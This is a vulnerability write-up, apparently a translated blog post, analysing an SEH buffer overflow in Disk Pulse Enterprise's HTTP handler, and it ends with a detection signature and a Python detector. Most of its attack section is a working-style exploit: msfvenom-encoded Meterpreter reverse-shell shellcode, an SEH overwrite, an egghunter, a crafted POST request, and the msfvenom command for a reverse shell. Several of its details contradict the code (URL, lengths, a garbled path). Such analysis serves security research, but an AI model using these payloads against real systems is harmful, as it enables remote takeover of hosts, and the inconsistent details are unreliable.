
How to implement vulnerability analysis of Disk Pulse Enterprise Window application

Release: 2023-05-18 15:04:07

1. Vulnerability Introduction

Disk Pulse Enterprise is a piece of software that monitors disk changes. It can be connected to and managed through the management port 9120 or the web management interface on port 80. Disk Pulse Enterprise ships a dynamic link library, libspp.dll, which contains the functions responsible for HTTP handling, and the problem lies in this library. When POST data is processed, its length is not strictly checked, so the data is copied into invalid memory and a buffer overflow results. This triggers SEH exception handling, and by overwriting the handler the attacker finally controls EIP and executes arbitrary code.

Software download link: https://www.exploit-db.com/apps/a679e77e57bf178b22bff5e86409a451-diskpulseent_setup_v9.0.34.exe

Vulnerability disclosure address: https://www.exploit-db.com/exploits/40452

2. Experimental environment

Windows 7 x86: system environment

IDA Pro: static analysis tool

Immunity Debugger: debugger dedicated to vulnerability analysis

WinDbg: vulnerability debugger

3. Vulnerability analysis

First, take a brief look at the POC; it is a fairly comprehensive buffer overflow exploit. Both the SEH structured exception handler and the egghunter technique are discussed in this article.

SEH Overview

Anyone familiar with programming will know Structured Exception Handling (SEH), the Windows mechanism for handling hardware and software exceptions. In source code it is usually expressed as a try/except block.

Egghunter Overview

Simply put, an egghunter is an addressing technique: a marker (the "egg") is placed in front of the shellcode, and a small piece of code searches memory for that marker and jumps to it. The egghunter technique is needed when the shellcode cannot be stored in the small buffer that is directly reachable from the overwritten handler.

First, let’s analyze the POC

import socket
import sys


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
buf =  ""
buf += "\xdb\xdf\xd9\x74\x24\xf4\xba\x92\xa7\xae\xd7\x5b\x29"
buf += "\xc9\xb1\x56\x31\x53\x18\x83\xc3\x04\x03\x53\x86\x45"
buf += "\x5b\x2b\x4e\x0b\xa4\xd4\x8e\x6c\x2c\x31\xbf\xac\x4a"
buf += "\x31\xef\x1c\x18\x17\x03\xd6\x4c\x8c\x90\x9a\x58\xa3"
buf += "\x11\x10\xbf\x8a\xa2\x09\x83\x8d\x20\x50\xd0\x6d\x19"
buf += "\x9b\x25\x6f\x5e\xc6\xc4\x3d\x37\x8c\x7b\xd2\x3c\xd8"
buf += "\x47\x59\x0e\xcc\xcf\xbe\xc6\xef\xfe\x10\x5d\xb6\x20"
buf += "\x92\xb2\xc2\x68\x8c\xd7\xef\x23\x27\x23\x9b\xb5\xe1"
buf += "\x7a\x64\x19\xcc\xb3\x97\x63\x08\x73\x48\x16\x60\x80"
buf += "\xf5\x21\xb7\xfb\x21\xa7\x2c\x5b\xa1\x1f\x89\x5a\x66"
buf += "\xf9\x5a\x50\xc3\x8d\x05\x74\xd2\x42\x3e\x80\x5f\x65"
buf += "\x91\x01\x1b\x42\x35\x4a\xff\xeb\x6c\x36\xae\x14\x6e"
buf += "\x99\x0f\xb1\xe4\x37\x5b\xc8\xa6\x5f\xa8\xe1\x58\x9f"
buf += "\xa6\x72\x2a\xad\x69\x29\xa4\x9d\xe2\xf7\x33\x94\xe5"
buf += "\x07\xeb\x1e\x65\xf6\x0c\x5e\xaf\x3d\x58\x0e\xc7\x94"
buf += "\xe1\xc5\x17\x18\x34\x73\x12\x8e\x77\x2b\x0c\xe5\x10"
buf += "\x29\x51\xe8\xbc\xa4\xb7\x5a\x6d\xe6\x67\x1b\xdd\x46"
buf += "\xd8\xf3\x37\x49\x07\xe3\x37\x80\x20\x8e\xd7\x7c\x18"
buf += "\x27\x41\x25\xd2\xd6\x8e\xf0\x9e\xd9\x05\xf0\x5f\x97"
buf += "\xed\x71\x4c\xc0\x89\x79\x8c\x11\x3c\x79\xe6\x15\x96"
buf += "\x2e\x9e\x17\xcf\x18\x01\xe7\x3a\x1b\x46\x17\xbb\x2d"
buf += "\x3c\x2e\x29\x11\x2a\x4f\xbd\x91\xaa\x19\xd7\x91\xc2"
buf += "\xfd\x83\xc2\xf7\x01\x1e\x77\xa4\x97\xa1\x21\x18\x3f"
buf += "\xca\xcf\x47\x77\x55\x30\xa2\x0b\x92\xce\x30\x24\x3b"
buf += "\xa6\xca\x74\xbb\x36\xa1\x74\xeb\x5e\x3e\x5a\x04\xae"
buf += "\xbf\x71\x4d\xa6\x4a\x14\x3f\x57\x4a\x3d\xe1\xc9\x4b"
buf += "\xb2\x3a\xfa\x36\xbb\xbd\xfb\xc6\xd5\xd9\xfc\xc6\xd9"
buf += "\xdf\xc1\x10\xe0\x95\x04\xa1\x57\xa5\x33\x84\xfe\x2c"
buf += "\x3b\x9a\x01\x65"

#pop pop ret 1001A333

nseh = "\xEB\x0B\x90\x90"
seh = "\x33\xA3\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /admin  HTTP/1.1\r\n"
evil += "Host:\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 21000\r\n\r\n"
evil += "\x41" * 12292 #subtract/add for payload
evil += "w00tw00t"
evil += "\x90" * 20
evil += buf
evil += "\x90" * 50
evil += "\x42" * 1554
evil += nseh
evil += seh
evil += "\x90" * 20
evil += egghunter
evil += "\x90" * 7000

print 'Sending evil buffer...'
print 'Payload Sent!'

The attacker constructs an HTTP request. It is a POST request, the URL is /login, and Content-Length is 17000. 12292 "\x41" bytes are sent, then the 8-byte marker "w00tw00t", then 20 "\x90" NOP bytes, then buf, then 50 more NOPs, then 1614 "\x42" bytes; the rest of the request just fills out the buffer.

Next, open the vulnerable version of the application in WinDbg.

Send the payload to trigger the vulnerability. After entering g (go), the return address has been overwritten; kb shows the call stack.

The GetNextString function of SCA_HttpParser in libspp.dll is called here. Next, the program enters SEH exception handling, and code execution is reached by overwriting the SEH handler.

Open IDA and analyze the address 10092822. The SCA_HttpParse class in libspp is responsible for HTTP-related operations, and it has a function named ExtractPostData that processes POST data. Set a breakpoint at the entry of this function; its entry address is 10092510.

Send the buffer from the POC above to trigger the vulnerability, as shown in the following figure:

Check how the parameters are passed: the POST data is passed in as the second parameter, and note that it is passed in whole.

Continue single-stepping here to reach the GetNextString function mentioned earlier.

This function does one thing: it splits its first parameter, the POST data, into separate parts for subsequent processing. Single-stepping through, you can see that after entering GetNextString for the first time, the first field is split off.

The first pass separates the user name. Next, GetNextString is entered again to split the second string. This splitting performs a series of copy operations.

Look at the value of EDX + ESI: it has already exceeded the size of the allocated buffer, and what follows is invalid memory.

The copy moves CL, the low byte of ECX, one byte at a time. Because it writes to an invalid address, SEH exception handling is triggered, which ultimately leads to code execution. Let's look at the pseudocode.

Now look at the pseudocode of the GetNextString function.

To find the offset at which the SEH record is overwritten, generate a cyclic pattern with mona:

!mona pattern_create 20000

After it runs, the pattern can be found in C:\日志\ FTPServer的\ pattern.txt.

After sending the pattern in place of the padding and triggering the crash, locate where the pattern landed:

!mona findmsp

Next, we need to find the address of a POP POP RET sequence.

Use !mona seh

Open the seh.txt log and look for the address of a code block that points to a POP POP RET sequence.

nseh = "\xEB\x0B\x90\x90"
seh = "\x33\xA3\x01\x10"

The shellcode in buf is generated with msfvenom:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

Send the POC to trigger the vulnerability and watch Metasploit's response; entering shell gives a shell on the vulnerable host.

Vulnerability signature: POST + any path + Content-Length: > 14292 + |eb| + any byte + |90 90|
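As an added example that is not part of the original article, the signature above expressed as a request checker in Python; the function names, the lenient header parsing and the sample requests are this example's assumptions:

```python
import re

# Constructed detector for the signature given above: POST, any path,
# Content-Length > 14292, and EB ?? 90 90 (a short jump followed by two
# NOPs, i.e. the nSEH record) anywhere in the body. Names are assumptions.
MIN_CONTENT_LENGTH = 14292
NSEH_PATTERN = re.compile(rb"\xeb.\x90\x90", re.DOTALL)

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None  # no end of headers: not a complete request
    lines = head.split(b"\r\n")
    parts = lines[0].split()  # tolerates the double space in the POC
    if len(parts) != 3:
        return None  # malformed request line
    method, path, _version = parts
    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def matches_signature(raw: bytes) -> bool:
    """True when the request matches all three parts of the signature."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    method, _path, headers, body = parsed
    if method != b"POST":
        return False
    try:
        content_length = int(headers.get(b"content-length", b"0"))
    except ValueError:
        return False
    if content_length <= MIN_CONTENT_LENGTH:
        return False
    return NSEH_PATTERN.search(body) is not None

# Constructed sample traffic: a normal login, a large benign upload, and a
# request laid out like the POC (padding, then the nSEH short jump), no shellcode.
BENIGN_REQUEST = (b"POST /login HTTP/1.1\r\nHost: diskpulse.example\r\n"
                  b"Content-Length: 26\r\n\r\nusername=alice&password=pw")
LARGE_BENIGN_REQUEST = (b"POST /upload HTTP/1.1\r\nHost: diskpulse.example\r\n"
                        b"Content-Length: 20000\r\n\r\n" + b"x" * 20000)
CRASH_REQUEST = (b"POST /admin HTTP/1.1\r\nHost: diskpulse.example\r\n"
                 b"Content-Length: 21000\r\n\r\n"
                 + b"\x41" * 12292 + b"\xeb\x0b\x90\x90" + b"\x90" * 20)
```

Content-Length is only a declared value and EB ?? 90 90 is just three fixed bytes, so a sensor should also check the actual body length and expect occasional matches in legitimate binary uploads.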